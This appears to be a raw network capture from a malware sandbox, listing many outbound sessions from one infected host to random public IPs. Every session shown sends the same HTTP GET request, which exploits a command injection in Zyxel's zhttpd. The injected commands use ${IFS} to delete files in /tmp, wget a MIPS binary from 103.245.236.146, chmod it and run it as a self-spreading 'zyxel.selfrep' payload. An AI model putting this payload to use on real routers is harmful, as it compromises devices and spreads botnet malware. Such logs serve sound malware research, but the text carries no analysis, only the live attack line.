                                                Jan 28, 2024 10:16:37.998164892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7749192.168.2.2356682151.253.15.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998195887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7750192.168.2.2346422168.140.166.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998250008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7751192.168.2.234929020.172.128.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998276949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7752192.168.2.233755662.127.193.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998286009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7753192.168.2.2354132116.245.21.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998332024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7754192.168.2.234272679.113.109.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998363972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7755192.168.2.235683484.20.0.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998368025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7756192.168.2.234751817.143.153.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998405933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7757192.168.2.2351342161.2.57.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998435020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7758192.168.2.2334082219.60.46.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998465061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7759192.168.2.2351110176.18.149.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998481035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7760192.168.2.2341358184.211.60.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998513937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7761192.168.2.23458022.176.52.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998523951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7762192.168.2.234961487.123.23.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998575926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7763192.168.2.2345492109.41.84.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998605967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7764192.168.2.233640223.251.9.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998640060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7765192.168.2.236072027.116.116.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998644114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7766192.168.2.2357042174.211.251.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998703957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7767192.168.2.2334744105.211.29.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998724937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7768192.168.2.2334962101.68.226.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998742104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7769192.168.2.23396765.159.203.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998785019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7770192.168.2.2337554140.61.9.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998811960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7771192.168.2.2346250102.239.55.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998855114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7772192.168.2.2360988182.207.121.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998874903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7773192.168.2.2359006204.248.101.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998879910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7774192.168.2.2337832102.138.113.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998879910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7775192.168.2.2351194137.197.82.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998933077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7776192.168.2.2343038164.120.250.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998975992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7777192.168.2.2360772101.178.108.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.998999119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7778192.168.2.233669082.155.56.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999028921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7779192.168.2.234174249.232.248.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999057055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7780192.168.2.2352082153.138.233.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999080896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7781192.168.2.2358178143.181.189.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999104023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7782192.168.2.2350174193.28.62.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999145985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7783192.168.2.234204243.38.155.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999161005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7784192.168.2.2339744164.55.216.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999197960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7785192.168.2.2347994101.114.6.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999228001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7786192.168.2.234412070.152.173.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999249935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7787192.168.2.23462925.55.155.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999279976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7788192.168.2.233860862.240.231.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999299049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7789192.168.2.2336338125.206.194.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999326944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7790192.168.2.234407091.237.26.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999357939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7791192.168.2.2351390199.199.188.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999366999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7792192.168.2.234439269.102.244.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999387980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7793192.168.2.2352736201.191.238.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999419928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7794192.168.2.23492841.30.154.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999455929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7795192.168.2.2342776177.36.241.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999481916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7796192.168.2.233504265.19.33.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999507904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7797192.168.2.234903083.224.118.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999521971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7798192.168.2.2333670208.17.27.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999571085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7799192.168.2.235412834.121.48.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999582052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7800192.168.2.2353724206.77.181.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999622107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7801192.168.2.235098869.193.146.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999645948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7802192.168.2.2336650184.7.45.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999654055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7803192.168.2.2343532221.219.79.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999682903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7804192.168.2.2355902128.60.255.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999743938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7805192.168.2.2344684126.150.239.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999763966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7806192.168.2.2342594156.12.57.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999785900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7807192.168.2.235291612.244.82.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999826908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7808192.168.2.2352542143.193.114.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999851942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7809192.168.2.2360564218.148.22.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.999854088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7810192.168.2.234042269.246.23.137443
                                                TimestampBytes transferredDirectionData
